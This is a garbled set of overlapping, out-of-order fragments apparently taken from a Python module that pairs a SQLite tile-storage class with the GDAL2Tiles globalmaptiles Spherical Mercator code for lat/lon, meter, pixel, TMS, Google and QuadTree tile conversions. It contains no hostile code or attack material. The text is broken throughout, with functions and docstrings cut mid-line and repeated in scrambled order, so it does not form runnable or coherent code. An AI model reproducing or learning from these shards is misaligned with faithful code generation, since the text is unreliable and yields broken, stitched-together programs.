(2 * math.atan( math.exp( lat * math.pi / 180.0)) - math.pi", "miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of", "TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the given tile in latutude/longitude", "zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self,", "z from tiles\") res = cur.fetchall() for (x, y, z) in res: xx=", "cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles ( x", ")) self.minzoom = None self.maxzoom = None self.written = set() self.db.commit() self.pending_images =", "mx, my def MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical Mercator", "(z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite", "calculations, we use the spherical form of projection, not the ellipsoidal form. Since", "zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py =", ": \"\"\" Create a new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename,", "def commitData(self, force = False): if len(self.pending_images) > 500 or force: cur =", "Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator", "target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering", "is used only for map display, and not for displaying numeric coordinates, we", "| /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What", "cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def", "circumference of the Earth in meters, which is 40 thousand kilometers, the coordinate", "corner, id is XYZ. Google placed the origin [0,0] to the top-left corner,", "top-left corner of the extent return tx, (2**zoom - 1) - ty def", "res py = (my + self.originShift) / res mapSize = self.tileSize << zoom", "mapSize - pyr res = self.Resolution( zoom ) mx = px * res", "(ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return (", "* res - self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts", "let me know. My email: klokan at klokan dot cz. I would like", "simplify the calculations, we use the spherical form of projection, not the ellipsoidal", "lower zoom level resolution is always divided by two initialResolution = 20037508.342789244 *", "Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self,", "y, z) in res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z)", "<< (i-1) if (tx & mask) != 0: digit += 1 if (ty", "res: image = str(res[0]) return image else : print (\"None found\") return None", "\"Returns tile for given mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom)", "i in range(zoom, 0, -1): digit = 0 mask = 1 << (i-1)", "defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of", "coordinates are using WGS84 datum, yeh? Yes, all lat/lon we are mentioning should", "same projection is degined as EPSG:3785. WKT definition is in the official EPSG", "zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\"", "<NAME> on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In", "else : print (\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) :", "product, translate it to another language or find it usefull for your project", "tile coordinates to Google Tile coordinates\" # coordinate origin is moved from bottom-left", "the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we use the", "rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\" def", "(math.pi / 180.0) my = my * self.originShift / 180.0 return mx, my", "# # mapSize = self.tileSize << zoom # return px, mapSize - py", "Equator)\" # return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return", "xx= x zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im)", "given zoom level\" res = self.Resolution( zoom ) px = (mx + self.originShift)", "clipped off. What are zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole", "20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in meters,", "- y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite", "Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps,", "gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for", "coordinates\" tx = int( math.ceil( px / float(self.tileSize) ) - 1 ) ty", "z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\"", "print (\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create", "lat/lon XY in metres XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913", "CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering)", "+lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of", "Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google", "QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84", "convention? The tile raster itself is the same (equal extent, projection, pixel size),", "of the pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize", "WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in", "are using WGS84 datum, yeh? Yes, all lat/lon we are mentioning should use", "the middle of extent. In fact you can calculate the constant as: 2", "blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info (", "you use this class in your product, translate it to another language or", "[0,0] in bottom-left). What coordinate conversions do we need for TMS Global Mercator", "+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable", "in EPSG:900913 and convert coordinates with PROJ.4? You can use standard GIS tools", "where it was used. Class is available under the open-source GDAL license (www.gdal.org).", "target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map", "is 40 thousand kilometers, the coordinate origin is in the middle of extent.", "bigger then 85.05112878 are clipped off. What are zoom level constants (pixels/meter) for", "return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ):", "self.maxzoom = z self.commitData() def commitData(self, force = False): if len(self.pending_images) > 500", "self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2],", "you can calculate the constant as: 2 * math.pi * 6378137 / 2.0", "p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel)", "For other GIS programs check the exact definition of the projection: More info", "(meters/pixel) for given zoom level (measured at Equator)\" # return (2 * math.pi", "GIS programs check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/", "zoom ) mx = px * res - self.originShift my = py *", "self.originShift) * 180.0 lat = 180 / math.pi * (2 * math.atan( math.exp(", "py def MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator coordinates\" px,", "return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ):", "6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ):", "Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles", "\"\"\" Create a new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite)", "zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= #", "if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE", "y, z, f) #cur.execute('insert into tiles (z, x, y,image) \\ # values (?,?,?,?)',", "/ 180.0) my = my * self.originShift / 180.0 return mx, my def", "# values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\"", "Create a new sqlite with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS')", "+ lat) * math.pi / 360.0 )) / (math.pi / 180.0) my =", "in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need", "You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of", "= 1 << (i-1) if (tx & mask) != 0: digit += 1", "| | <-> /----/ <-> Google \\ / | | /--------/ QuadTree -----", "self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom:", "#def PixelsToRaster(self, px, py, zoom): # \"Move the origin of pixel coordinates to", "do we need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels", "180 / math.pi * (2 * math.atan( math.exp( lat * math.pi / 180.0))", "from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <-> | |", "px, pyr, zoom): \"Converts pixel coordinates in given zoom level of pyramid to", "coordinates, we don't need the extra precision of an ellipsoidal projection. The spherical", "create a raster in EPSG:900913 and convert coordinates with PROJ.4? You can use", "\"Returns a tile covering region in given pixel coordinates\" tx = int( math.ceil(", "z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if", "im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS", "ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self,", "mask import sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02", "are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey", "exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is", "- pyr res = self.Resolution( zoom ) mx = px * res -", "2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in", "tools supports -t_srs 'epsg:900913'. For other GIS programs check the exact definition of", "as if the were on the WGS84 ellipsoid. From MSDN documentation: To simplify", "# \"Move the origin of pixel coordinates to top-left corner\" # # mapSize", "tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom ): \"Converts", "pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize - pyr", "Datum to XY in Spherical Mercator EPSG:900913\" mx = lon * self.originShift /", "pixelSize > self.Resolution(i): if i!=0: return i-1 else: return 0 # We don't", "float(self.tileSize) ) - 1 ) ty = int( math.ceil( py / float(self.tileSize) )", "a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using", "(z, x, y,image) \\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def", "PixelsToTile(self, px, py): \"Returns a tile covering region in given pixel coordinates\" tx", "constants (pixels/meter) for pyramid with EPSG:900913? whole region is on top of pyramid", "xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into", "AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize", "(based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible", "\"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods", "math.atan( math.exp( lat * math.pi / 180.0)) - math.pi / 2.0) return lat,", "are mentioning should use WGS84 Geodetic Datum. Well, the web clients like Google", "= 0 mask = 1 << (i-1) if (tx & mask) != 0:", "your project please let me know. My email: klokan at klokan dot cz.", "Earth in meters, which is 40 thousand kilometers, the coordinate origin is in", "Tiles in TMS are counted from [0,0] in the bottom-left corner, id is", "return px, mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns tile for", "API, ... and you can overlay them on top of base maps of", "files methods for simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename,", "y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x,", "2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas", "180.0) my = my * self.originShift / 180.0 return mx, my def MetersToLatLon(self,", "programs check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The", "p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _", "Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx / self.originShift)", "targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering scheme from a", "defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh?", "TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor()", "self.Resolution(i): if i!=0: return i-1 else: return 0 # We don't want to", "it usefull for your project please let me know. My email: klokan at", "lat/lon coordinates are using WGS84 datum, yeh? Yes, all lat/lon we are mentioning", "self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid", "Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in metres XY pixels", "maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx,", "os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\"", "the Earth in meters, which is 40 thousand kilometers, the coordinate origin is", "Maps are projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates", "pixel coordinates in given zoom level\" res = self.Resolution( zoom ) px =", "\"\"\" read a single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image", "============================================================== Functions necessary for generation of global tiles used on the web. It", "yeh? Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well,", "$\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\" def __init__(self,", "def MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator coordinates\" px, py", "info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX:", "necessary for generation of global tiles used on the web. It contains classes", "pixelSize ): \"Maximal scaledown zoom of the pyramid closest to the pixelSize.\" for", "self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def", "if self.minzoom is None or z < self.minzoom: self.minzoom = z if self.maxzoom", "os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True) cur", "20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84 Datum to", "Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:900913", "in given pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize) ) -", ": \"\"\" write a single tile from a file \"\"\" self.writeImage(x, y, z,", "--------------------------- Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE,", "MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon", "+nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS", "or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else:", "= (mx / self.originShift) * 180.0 lat = (my / self.originShift) * 180.0", "PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All", "lon * self.originShift / 180.0 my = math.log( math.tan((90 + lat) * math.pi", "xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= #", "given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom )", "Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if", "-1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with", "input: vrt file (-addalpha) in 3857 projection (projection is forced due # to", "res = cur.fetchone() if res: image = str(res[0]) return image else : print", "Constant 20037508.342789244 comes from the circumference of the Earth in meters, which is", "z, f.read()) def writeImage(self, x, y, z, image) : \"\"\" write a single", "TMS / \\ <-> | | <-> /----/ <-> Google \\ / |", "metres XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- --", "40 thousand kilometers, the coordinate origin is in the middle of extent. In", "y, z, image) : \"\"\" write a single tile from string \"\"\" if", "\\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False):", "bounds = self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon", "given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx =", "are counted from [0,0] in the bottom-left corner, id is XYZ. Google placed", "know where it was used. Class is available under the open-source GDAL license", "MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given zoom", "/ (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid closest", "y, z from tiles\") res = cur.fetchall() for (x, y, z) in res:", "between TMS and Google Maps/QuadTree tile name convention? The tile raster itself is", "CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile", "z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create", "ty = (2**zoom - 1) - ty for i in range(zoom, 0, -1):", "- 1) - ty for i in range(zoom, 0, -1): digit = 0", "self.originShift) * 180.0 lat = (my / self.originShift) * 180.0 lat = 180", "sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault", "= cur.fetchall() for (x, y, z) in res: xx= x zz= 17 -", "id is XYZ. Google placed the origin [0,0] to the top-left corner, reference", "XY in metres XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----.", "TileBounds(self, tx, ty, zoom): \"Returns bounds of the given tile in EPSG:900913 coordinates\"", "\"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z, image) : \"\"\"", "/ 256 = 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree", "os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF", "( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat,", "python #****************************************************************************** # From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION", "__init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new storage file,", "tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX", "[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth", "- y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\"", "meters, which is 40 thousand kilometers, the coordinate origin is in the middle", "mentioning should use WGS84 Geodetic Datum. Well, the web clients like Google Maps", "(zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution is always", "Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx / self.originShift) *", "on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More info", "the tools supports -t_srs 'epsg:900913'. For other GIS programs check the exact definition", "============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined in", "'epsg:900913'. For other GIS programs check the exact definition of the projection: More", "calculate the constant as: 2 * math.pi * 6378137 / 2.0 $ echo", "tile, every lower zoom level resolution is always divided by two initialResolution =", "\"\"\" Create a new sqlite with BigPlanet numbering scheme from a TMS one\"\"\"", "zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level\" res =", "= (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\"", "\"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level\" res = self.Resolution(", "for pyramid with EPSG:900913? whole region is on top of pyramid (zoom=0) covered", "PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433],", "tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:900913'.", "with abs(latitude) bigger then 85.05112878 are clipped off. What are zoom level constants", "EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy =", "zoom return px, mapSize - py def PixelsToTile(self, px, py): \"Returns a tile", "str(res[0]) return image else : print (\"None found\") return None def createFromDirectory(self, filename,", "res mapSize = self.tileSize << zoom return px, mapSize - py def PixelsToTile(self,", "My email: klokan at klokan dot cz. I would like to know where", "zoom ): \"Resolution (meters/pixel) for given zoom level (measured at Equator)\" # return", "(?))\", (self.type, )) self.minzoom = None self.maxzoom = None self.written = set() self.db.commit()", "py, zoom): # \"Move the origin of pixel coordinates to top-left corner\" #", "one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\")", "= \"\" ty = (2**zoom - 1) - ty for i in range(zoom,", "x, y, z) : \"\"\" read a single tile as string \"\"\" cur", "spherical projection causes approximately 0.33 percent scale distortion in the Y direction, which", "def readImage(self, x, y, z) : \"\"\" read a single tile as string", ") def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the given tile", "EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More info at:", "return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given", "py * res - self.originShift return mx, my def MetersToPixels(self, mx, my, zoom):", "cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom,", "coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def", "use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools", "+k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global", "as EPSG:3785. WKT definition is in the official EPSG database. Proj4 Text: +proj=merc", "z, f) : \"\"\" write a single tile from a file \"\"\" self.writeImage(x,", "raster in EPSG:900913 and convert coordinates with PROJ.4? You can use standard GIS", "Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY", "zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self,", "tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a", "x, y, z, image) : \"\"\" write a single tile from string \"\"\"", "\\ / | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web", "force = False): if len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert", "self.db.cursor() cur.execute(\"select x, y, z from tiles\") res = cur.fetchall() for (x, y,", "zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom", "need the extra precision of an ellipsoidal projection. The spherical projection causes approximately", "maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the", "of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785,", "mx = px * res - self.originShift my = py * res -", "= my * self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my", "is XYZ. Google placed the origin [0,0] to the top-left corner, reference is", "writeImage(self, x, y, z, image) : \"\"\" write a single tile from string", "documentation: To simplify the calculations, we use the spherical form of projection, not", "_ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon, p4_lat,", "scaledown zoom of the pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL):", "z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force = False): if", "read a single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from", ") - 1 ) return tx, ty #def PixelsToRaster(self, px, py, zoom): #", "import os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\"", "level constants (pixels/meter) for pyramid with EPSG:900913? whole region is on top of", "XYZ. Google placed the origin [0,0] to the top-left corner, reference is XYZ.", "XY in Spherical Mercator EPSG:900913\" mx = lon * self.originShift / 180.0 my", "| | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService", "* math.pi / 360.0 )) / (math.pi / 180.0) my = my *", "http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of Code", "int( math.ceil( py / float(self.tileSize) ) - 1 ) return tx, ty #def", "bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom", "self.written = set() self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\" Open", "file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs)", "\"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom", "WGS84 Datum\" lon = (mx / self.originShift) * 180.0 lat = (my /", "project please let me know. My email: klokan at klokan dot cz. I", "py): \"Returns a tile covering region in given pixel coordinates\" tx = int(", "classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for", "return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution /", "self.originShift) / res mapSize = self.tileSize << zoom return px, mapSize - py", "pixel size), there is just different identification of the same raster tile. Tiles", "new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite)", "OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps,", "mapSize = self.tileSize << zoom # return px, mapSize - py def MetersToTile(self,", "GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps", "os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx", "where x=? and y=? and z=?\", (x, y, z)) res = cur.fetchone() if", "zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'):", "GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1],", "the coordinate origin is in the middle of extent. In fact you can", "datum, yeh? Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.", "corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree name, defined", "is the same (equal extent, projection, pixel size), there is just different identification", "(self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown", "WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])", "None self.written = set() self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\"", "def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new storage", "target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res", "\"Maximal scaledown zoom of the pyramid closest to the pixelSize.\" for i in", "= tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062", "sqlite file from a z/y/x.ext directory 